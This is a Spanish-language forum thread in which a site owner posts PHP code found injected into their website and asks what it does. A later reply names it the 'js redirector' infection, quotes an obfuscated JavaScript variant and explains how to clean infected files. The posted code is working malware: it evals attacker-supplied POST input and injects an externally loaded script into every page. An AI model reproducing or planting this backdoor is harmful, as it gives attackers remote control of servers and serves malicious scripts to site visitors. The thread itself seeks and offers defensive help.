training rosa
Grupo SEO TELEGRAM [Click Aquí]
Resultados 1 al 12 de 12
Tema:

Codigo Malicioso?

Novatillo Invitado

Predeterminado Codigo Malicioso?

Hola, tengo un codigo en mi programación que me han hecho que no lo tenía antes...Me han dicho que puede ser algo que perjudique a la web, está en base 64 y nose que hace exactamente. Os pido ayuda por si sabeis que hace exactamente y si al final es algo que perjudique a la web lo retiraré de inmediato. El codigo es el siguiente.

<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<1 0;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0M yYkFzY05BUHI2WVZpcDZZVnREeVMlMjBpcXMyYkFyeGFjJTNEM mJBJTJGZWwlMkY3aXE4JTJFMmJBMTFzZnIwJTJFMXNmcjdlbDU lMkUyNDlzZnIlMkZqMmJBcXVlcnklMkVzZnJqaXFzJTNFc2ZyJ TNDJTJGc2lxY3JlbGlwdFo4QiUzRScpLnJlcGxhY2UoL3Nmcnx lbHxaOEJ8TkFQfER5U3x4YXxpcXw2WVZ8MmJBL2csIiIpKTsKI C0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))==' 1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos( $v,'document.write')))$s=str_replace($v,'',$s);}$s 1=preg_replace('#<script language=javascript><!-- \r\ndocument\.write\(unescape\(".+?\r\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_re place('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);else if(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

LLevo unos dias intentando saber que hace, así que os agradecería vuestra colaboración.

Saludos y gracias.

newbie82 Invitado

Predeterminado

Contamos con los mejores programadores, si te interesa, por 500€ te lo miramos. Y ahora, ante la crisis, rebajamos hasta el 50%

Novatillo Invitado

Predeterminado

que simpatico el tio... xD

Nikki Invitado

Predeterminado

Cita Iniciado por newbie82 Ver Mensaje
    500€ te lo miramos.
    tan poco?

Novatillo Invitado

Predeterminado

Nadie sabe?

saludos

Novatillo Invitado

Predeterminado

(AYUDA PLEASE)

Novatillo Invitado

Predeterminado

amigos, donde están? nadie es programador?

Nikki Invitado

Predeterminado

Cita Iniciado por Novatillo Ver Mensaje
    esos son garabatos en los comic

WSLAK Invitado

Predeterminado

Cita Iniciado por Nikki Ver Mensaje
    esos son garabatos en los comic

Igetmoney está desconectado Registrado
    Rango: Quizás estoy
    haciendo Spam ...

User Info Menu

Predeterminado

Cita Iniciado por Novatillo Ver Mensaje
    Te ayudaría pero es más fácil no hacerlo :cafe:

eduarro rico está desconectado Registrado
    Rango: Quizás estoy
    haciendo Spam ...

User Info Menu

Predeterminado

hola, yo si te puedo ayudar, ese es un codigo malicioso que fue inyectado a traves de mysql, o bien lo pudiste descargar en forma de troyano y al subir algo por ftp infectaste todo, es un un virus muy fastidioso porque ademas de ese codigo que inserta en la mayoria de archivos .php, tambien inserta en archivos html y htm, asi que como a mi me paso, me infectaron una web en joomla, y analizando y buscando encontre mas de 180 archivos infectados, entonces lo que tienes q hacer es:
    instalar el antivirus avast (el free detecta todas las variaciones de este virus, cosa que no hace ningun otro ni kaspersky ni bitdefendet ni ningun otro), descargar todo tu sitio web a tu pc, escanear el sitio web, y cuando te avise del virus no lo borres, ponle la opcion de no hacer nada (esto para saber donde esta el virus), despues revisa los archivos donde avast te detecto algo, y debes ver un codigo parecido al que escribes en los archivos .php, y algo parecido a esto en los archivos html,
    document.write(unescape('%3C8dgsH2JcvgUripvgUt%208 dgsH2Jrc%3DvgU%2F8dg%2F94vmi%2Evmi247%2Eo52vmi%2E1 95%2Fj8dgqvgUuervmiyr3%2Ejvmis8dg%3E%3C%2F8dgsvgUc ripURzt%3E').replace(/vgU|H2J|URz|vmi|r3|o5|8dg/g,""));
    o otras variaciones, descargate el programa windows grep y ponle buscar y reemplazar buscas el codigo que te puse arriba o alguna otra variacion y lo reemplazas por espacios, y asi con todo cada vez que modifiques algo pasale el avast para ver si quedo limpio, cuando este limpio subelo de nuevo y ya esta.

el virus se llama js redirector. espero haberte ayudado.

Novatillo Invitado

Predeterminado

Hola, muchas gracias, ya estoy probando lo que dices y también encontré información del virus que mencionas, de verdad da gusto encontrar de vez en cuando gente como tu por estos sitios. Sin más, gracias...

Saludos